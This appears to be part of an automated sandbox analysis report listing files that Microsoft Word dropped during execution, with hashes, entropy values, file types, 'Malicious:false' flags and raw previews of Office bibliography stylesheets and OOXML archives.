                                                  Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):5151
                                                  Entropy (8bit):7.859615916913808
                                                  Encrypted:false
                                                  SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                                  MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                  SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                  SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                  SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                  Malicious:false
                                                  Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):333258
                                                  Entropy (8bit):4.654450340871081
                                                  Encrypted:false
                                                  SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                                  MD5:5632C4A81D2193986ACD29EADF1A2177
                                                  SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                                  SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                                  SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):296658
                                                  Entropy (8bit):5.000002997029767
                                                  Encrypted:false
                                                  SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                                  MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                                  SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                                  SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                                  SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):268317
                                                  Entropy (8bit):5.05419861997223
                                                  Encrypted:false
                                                  SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                                  MD5:51D32EE5BC7AB811041F799652D26E04
                                                  SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                                  SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                                  SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):255948
                                                  Entropy (8bit):5.103631650117028
                                                  Encrypted:false
                                                  SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                                  MD5:9888A214D362470A6189DEFF775BE139
                                                  SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                                  SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                                  SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):251032
                                                  Entropy (8bit):5.102652100491927
                                                  Encrypted:false
                                                  SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                                  MD5:F425D8C274A8571B625EE66A8CE60287
                                                  SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                                  SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                                  SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):284415
                                                  Entropy (8bit):5.00549404077789
                                                  Encrypted:false
                                                  SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                                  MD5:33A829B4893044E1851725F4DAF20271
                                                  SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                                  SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                                  SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):294178
                                                  Entropy (8bit):4.977758311135714
                                                  Encrypted:false
                                                  SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                                  MD5:0C9731C90DD24ED5CA6AE283741078D0
                                                  SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                                  SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                                  SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):270198
                                                  Entropy (8bit):5.073814698282113
                                                  Encrypted:false
                                                  SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                                  MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                                  SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                                  SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                                  SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):217137
                                                  Entropy (8bit):5.068335381017074
                                                  Encrypted:false
                                                  SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                                  MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                                  SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                                  SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                                  SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):254875
                                                  Entropy (8bit):5.003842588822783
                                                  Encrypted:false
                                                  SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                                  MD5:377B3E355414466F3E3861BCE1844976
                                                  SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                                  SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                                  SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):344303
                                                  Entropy (8bit):5.023195898304535
                                                  Encrypted:false
                                                  SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                                  MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                                  SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                                  SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                                  SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):250983
                                                  Entropy (8bit):5.057714239438731
                                                  Encrypted:false
                                                  SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                                  MD5:F883B260A8D67082EA895C14BF56DD56
                                                  SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                                  SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                                  SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Word 2007+
                                                  Category:dropped
                                                  Size (bytes):51826
                                                  Entropy (8bit):5.541375256745271
                                                  Encrypted:false
                                                  SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                                  MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                                  SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                                  SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                                  SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                                  Malicious:false
                                                  Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Word 2007+
                                                  Category:dropped
                                                  Size (bytes):47296
                                                  Entropy (8bit):6.42327948041841
                                                  Encrypted:false
                                                  SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                                  MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                                  SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                                  SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                                  SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                                  Malicious:false
                                                  Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Word 2007+
                                                  Category:dropped
                                                  Size (bytes):34415
                                                  Entropy (8bit):7.352974342178997
                                                  Encrypted:false
                                                  SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                                  MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                                  SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                                  SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                                  SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                                  Malicious:false
